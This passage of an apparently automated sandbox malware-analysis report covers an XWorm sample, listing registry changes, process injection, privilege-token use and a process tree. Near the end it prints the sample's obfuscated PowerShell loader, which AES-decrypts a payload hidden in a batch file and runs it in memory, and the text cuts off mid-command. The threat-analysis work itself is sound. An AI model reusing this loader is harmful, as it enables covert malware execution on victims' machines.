- Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionTime = 82079ef260cada01 (svchost.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E3FB4E05F" (svchost.exe)
- Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections (svchost.exe)
- Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\RAS AutoDial (svchost.exe)
- Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\RAS AutoDial\Default (svchost.exe)
- Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionTime = cc2ee48762cada01 (svchost.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client" (svchost.exe)
- Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecision = "0" (svchost.exe)
- Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionTime = caabb54d61cada01 (svchost.exe)
- Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections (svchost.exe)
- Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61 (svchost.exe)
- Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionReason = "1" (svchost.exe)
The WPAD, RAS AutoDial and MuiCache writes are made under the LOCAL SERVICE (S-1-5-19) and .DEFAULT hives, i.e. by Windows' own service hosts doing proxy auto-discovery and dial-up bookkeeping, and are not sample behaviour.
Modifies registry class (53 IoCs)
Processes: svchost.exe, Explorer.EXE, powershell.exe
In the list below, P stands for \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings and A for P\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData.
- Set value (int) A\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133641655111398851" (svchost.exe)
- Set value (int) A\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PTT = "133641655992145014" (svchost.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ (Explorer.EXE)
- Key created A\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1 (svchost.exe)
- Key created A\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU (svchost.exe)
- Set value (int) A\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PCT = "133641655787268193" (svchost.exe)
- Key created A\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU (svchost.exe)
- Set value (int) A\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\ICT = "133641655754612850" (svchost.exe)
- Set value (int) A\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ITT = "133641655800705768" (svchost.exe)
- Set value (int) A\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PCT = "133641655955094805" (svchost.exe)
- Set value (data) A\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m = f401000040010000 (Explorer.EXE)
- Key created A\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy (svchost.exe)
- Key created A\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 (svchost.exe)
- Set value (data) P\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff (Explorer.EXE)
- Key created A\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App (svchost.exe)
- Key created A\Microsoft.Windows.Search_cw5n1h2txyewy (svchost.exe)
- Key created P\Software\Microsoft\Windows\Shell\BagMRU (Explorer.EXE)
- Key created A\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1 (svchost.exe)
- Set value (int) A\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133641655285734553" (svchost.exe)
- Key created A\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI (svchost.exe)
- Key created A\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM (svchost.exe)
- Key created A\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App (svchost.exe)
- Set value (int) A\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ICT = "133641655790549625" (svchost.exe)
- Key created A\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 (svchost.exe)
- Key created A\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU (svchost.exe)
- Key created A\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU (svchost.exe)
- Key created A\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI (svchost.exe)
- Key created P (powershell.exe)
- Set value (int) A\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PTT = "133641655800862074" (svchost.exe)
- Set value (int) A\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133641655989134936" (svchost.exe)
- Key created A\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU (svchost.exe)
- Set value (int) A\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ICT = "133641655957085279" (svchost.exe)
- Set value (data) P\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots (Explorer.EXE)
- Key created A\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI (svchost.exe)
- Set value (int) A\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ITT = "133641655992024854" (svchost.exe)
- Key created A\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen (Explorer.EXE)
- Key created P (Explorer.EXE)
- Set value (int) A\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133641655965644999" (svchost.exe)
- Set value (int) A\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133641655283604926" (svchost.exe)
- Key created A\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel (svchost.exe)
- Key created A\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1 (svchost.exe)
- Set value (int) A\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133641655960914783" (svchost.exe)
- Set value (int) A\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\ITT = "133641655790862123" (svchost.exe)
- Key created A\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI (svchost.exe)
- Set value (int) A\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133641655751018336" (svchost.exe)
- Key created A\windows.immersivecontrolpanel_cw5n1h2txyewy (svchost.exe)
- Key created A\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame (Explorer.EXE)
- Key created A\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI (svchost.exe)
- Key created A\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App (svchost.exe)
- Key created A\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy (svchost.exe)
- Key created A\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI (svchost.exe)
- Key created A\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy (svchost.exe)
- Key created A\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m (Explorer.EXE)
These are timestamp and shell-state entries for built-in system apps (Search, Settings, ShellExperienceHost, ContentDeliveryManager, AAD broker) written by the sandbox's own Explorer.EXE and service hosts, plus one empty key create by powershell.exe; they carry no detection value for this sample.
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: powershell.exe, powershell.exe, powershell.exe, msedge.exe, msedge.exe, identity_helper.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, svchost.exe, mshta.exe
Occurrences per pid (64 in total):
- 2652 powershell.exe: 2
- 2736 powershell.exe: 2
- 620 powershell.exe: 17
- 3972 msedge.exe: 2
- 2340 msedge.exe: 2
- 2604 identity_helper.exe: 2
- 3740 powershell.exe: 3
- 856 powershell.exe: 3
- 4664 powershell.exe: 3
- 2688 powershell.exe: 3
- 2360 svchost.exe: 12
- 4996 mshta.exe: 13
The 2360 (svchost.exe) and 4996 (mshta.exe) entries are the two dropped XWorm processes enumerating running processes in alternation; the msedge.exe and identity_helper.exe entries are the browser's own.
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes: Explorer.EXE
- 3488 Explorer.EXE
Suspicious behavior: LoadsDriver (6 IoCs)
Processes (pid): 4, 4, 4, 4, 4, 656
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (13 IoCs)
Processes: msedge.exe
- 2340 msedge.exe (13 occurrences)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeIncreaseQuotaPrivilege 2736 powershell.exe Token: SeSecurityPrivilege 2736 powershell.exe Token: SeTakeOwnershipPrivilege 2736 powershell.exe Token: SeLoadDriverPrivilege 2736 powershell.exe Token: SeSystemProfilePrivilege 2736 powershell.exe Token: SeSystemtimePrivilege 2736 powershell.exe Token: SeProfSingleProcessPrivilege 2736 powershell.exe Token: SeIncBasePriorityPrivilege 2736 powershell.exe Token: SeCreatePagefilePrivilege 2736 powershell.exe Token: SeBackupPrivilege 2736 powershell.exe Token: SeRestorePrivilege 2736 powershell.exe Token: SeShutdownPrivilege 2736 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeSystemEnvironmentPrivilege 2736 powershell.exe Token: SeRemoteShutdownPrivilege 2736 powershell.exe Token: SeUndockPrivilege 2736 powershell.exe Token: SeManageVolumePrivilege 2736 powershell.exe Token: 33 2736 powershell.exe Token: 34 2736 powershell.exe Token: 35 2736 powershell.exe Token: 36 2736 powershell.exe Token: SeIncreaseQuotaPrivilege 2736 powershell.exe Token: SeSecurityPrivilege 2736 powershell.exe Token: SeTakeOwnershipPrivilege 2736 powershell.exe Token: SeLoadDriverPrivilege 2736 powershell.exe Token: SeSystemProfilePrivilege 2736 powershell.exe Token: SeSystemtimePrivilege 2736 powershell.exe Token: SeProfSingleProcessPrivilege 2736 powershell.exe Token: SeIncBasePriorityPrivilege 2736 powershell.exe Token: SeCreatePagefilePrivilege 2736 powershell.exe Token: SeBackupPrivilege 2736 powershell.exe Token: SeRestorePrivilege 2736 powershell.exe Token: SeShutdownPrivilege 2736 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeSystemEnvironmentPrivilege 2736 powershell.exe Token: SeRemoteShutdownPrivilege 2736 powershell.exe Token: SeUndockPrivilege 2736 powershell.exe Token: SeManageVolumePrivilege 2736 powershell.exe Token: 33 2736 powershell.exe Token: 34 2736 powershell.exe Token: 35 2736 powershell.exe Token: 36 2736 powershell.exe Token: SeIncreaseQuotaPrivilege 2736 powershell.exe Token: SeSecurityPrivilege 2736 powershell.exe Token: SeTakeOwnershipPrivilege 2736 powershell.exe Token: SeLoadDriverPrivilege 2736 powershell.exe Token: SeSystemProfilePrivilege 2736 powershell.exe Token: SeSystemtimePrivilege 2736 powershell.exe Token: SeProfSingleProcessPrivilege 2736 powershell.exe Token: SeIncBasePriorityPrivilege 2736 powershell.exe Token: SeCreatePagefilePrivilege 2736 powershell.exe Token: SeBackupPrivilege 2736 powershell.exe Token: SeRestorePrivilege 2736 powershell.exe Token: SeShutdownPrivilege 2736 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeSystemEnvironmentPrivilege 2736 powershell.exe Token: SeRemoteShutdownPrivilege 2736 powershell.exe Token: SeUndockPrivilege 2736 powershell.exe Token: SeManageVolumePrivilege 2736 powershell.exe Token: 33 2736 powershell.exe Token: 34 2736 powershell.exe Token: 35 2736 powershell.exe -
Suspicious use of FindShellTrayWindow 32 IoCs
Processes:
msedge.exeExplorer.EXEmsdt.exepid process 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 5892 msdt.exe 3488 Explorer.EXE 3488 Explorer.EXE 2340 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
msedge.exeExplorer.EXEpid process 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 2340 msedge.exe 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
svchost.exemshta.exeExplorer.EXEpid process 2360 svchost.exe 4996 mshta.exe 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE 3488 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 4600 wrote to memory of 264 4600 cmd.exe cmd.exe PID 4600 wrote to memory of 264 4600 cmd.exe cmd.exe PID 4600 wrote to memory of 2652 4600 cmd.exe powershell.exe PID 4600 wrote to memory of 2652 4600 cmd.exe powershell.exe PID 2652 wrote to memory of 2736 2652 powershell.exe powershell.exe PID 2652 wrote to memory of 2736 2652 powershell.exe powershell.exe PID 2652 wrote to memory of 2148 2652 powershell.exe WScript.exe PID 2652 wrote to memory of 2148 2652 powershell.exe WScript.exe PID 2148 wrote to memory of 1756 2148 WScript.exe cmd.exe PID 2148 wrote to memory of 1756 2148 WScript.exe cmd.exe PID 1756 wrote to memory of 412 1756 cmd.exe cmd.exe PID 1756 wrote to memory of 412 1756 cmd.exe cmd.exe PID 1756 wrote to memory of 620 1756 cmd.exe powershell.exe PID 1756 wrote to memory of 620 1756 cmd.exe powershell.exe PID 620 wrote to memory of 3488 620 powershell.exe Explorer.EXE PID 620 wrote to memory of 2560 620 powershell.exe svchost.exe PID 620 wrote to memory of 1968 620 powershell.exe svchost.exe PID 620 wrote to memory of 1372 620 powershell.exe svchost.exe PID 620 wrote to memory of 1764 620 powershell.exe svchost.exe PID 620 wrote to memory of 1564 620 powershell.exe svchost.exe PID 620 wrote to memory of 1124 620 powershell.exe svchost.exe PID 620 wrote to memory of 2740 620 powershell.exe svchost.exe PID 620 wrote to memory of 1552 620 powershell.exe svchost.exe PID 620 wrote to memory of 2728 620 powershell.exe svchost.exe PID 620 wrote to memory of 1788 620 powershell.exe svchost.exe PID 620 wrote to memory of 1736 620 powershell.exe svchost.exe PID 620 wrote to memory of 3620 620 powershell.exe svchost.exe PID 620 wrote to memory of 1132 620 powershell.exe svchost.exe PID 620 wrote to memory of 3692 620 powershell.exe svchost.exe PID 620 wrote to memory of 2312 620 powershell.exe svchost.exe PID 620 wrote to memory of 1316 620 powershell.exe svchost.exe PID 620 wrote to memory of 1116 620 powershell.exe svchost.exe PID 620 wrote to memory of 2884 620 powershell.exe svchost.exe PID 620 wrote to memory of 1700 620 powershell.exe svchost.exe PID 620 wrote to memory of 2680 620 powershell.exe svchost.exe PID 620 wrote to memory of 2876 620 powershell.exe svchost.exe PID 620 wrote to memory of 5032 620 powershell.exe svchost.exe PID 620 wrote to memory of 912 620 powershell.exe svchost.exe PID 620 wrote to memory of 508 620 powershell.exe svchost.exe PID 620 wrote to memory of 896 620 powershell.exe svchost.exe PID 620 wrote to memory of 2056 620 powershell.exe svchost.exe PID 620 wrote to memory of 2252 620 powershell.exe svchost.exe PID 620 wrote to memory of 1660 620 powershell.exe svchost.exe PID 620 wrote to memory of 1460 620 powershell.exe svchost.exe PID 620 wrote to memory of 2244 620 powershell.exe svchost.exe PID 620 wrote to memory of 2036 620 powershell.exe svchost.exe PID 620 wrote to memory of 2232 620 powershell.exe svchost.exe PID 620 wrote to memory of 1144 620 powershell.exe svchost.exe PID 620 wrote to memory of 944 620 powershell.exe svchost.exe PID 620 wrote to memory of 1820 620 powershell.exe svchost.exe PID 620 wrote to memory of 1224 620 powershell.exe svchost.exe PID 620 wrote to memory of 4376 620 powershell.exe svchost.exe PID 620 wrote to memory of 2992 620 powershell.exe svchost.exe PID 620 wrote to memory of 1216 620 powershell.exe svchost.exe PID 620 wrote to memory of 2976 620 powershell.exe svchost.exe PID 620 wrote to memory of 1000 620 powershell.exe svchost.exe PID 620 wrote to memory of 1328 620 powershell.exe svchost.exe PID 620 wrote to memory of 788 620 powershell.exe svchost.exe PID 620 wrote to memory of 3356 620 powershell.exe svchost.exe PID 620 wrote to memory of 1976 620 powershell.exe svchost.exe PID 620 wrote to memory of 744 620 powershell.exe hat.exe PID 620 wrote to memory of 744 620 powershell.exe hat.exe PID 620 wrote to memory of 744 620 powershell.exe hat.exe PID 620 wrote to memory of 4996 620 powershell.exe mshta.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Checks processor information in registry
- Modifies registry class
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding2⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding2⤵
-
C:\Windows\system32\BackgroundTaskHost.exe"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider2⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding2⤵
-
C:\Windows\System32\sdiagnhost.exeC:\Windows\System32\sdiagnhost.exe -Embedding2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter3⤵
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter3⤵
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca2⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel2⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel2⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
- Modifies firewall policy service
- Modifies security service
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Output.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6bNEY3sTSdsJ4NfUEY/2/xRnHnqPxOtMFI0yhkApf/U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP6F/5ltKE9CwNnyWHWWxw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZUEUT=New-Object System.IO.MemoryStream(,$param_var); $EHmsi=New-Object System.IO.MemoryStream; $YTwNB=New-Object System.IO.Compression.GZipStream($ZUEUT, [IO.Compression.CompressionMode]::Decompress); $YTwNB.CopyTo($EHmsi); $YTwNB.Dispose(); $ZUEUT.Dispose(); $EHmsi.Dispose(); $EHmsi.ToArray();}function execute_function($param_var,$param2_var){ $SNmHa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sndxj=$SNmHa.EntryPoint; $sndxj.Invoke($null, $param2_var);}$SliZP = 'C:\Users\Admin\AppData\Local\Temp\Output.bat';$host.UI.RawUI.WindowTitle = $SliZP;$fGcJE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SliZP).Split([Environment]::NewLine);foreach ($kVlCf in $fGcJE) { if ($kVlCf.StartsWith('mrPiDrvnjNQnkoxilunb')) { $LRDpi=$kVlCf.Substring(20); break; 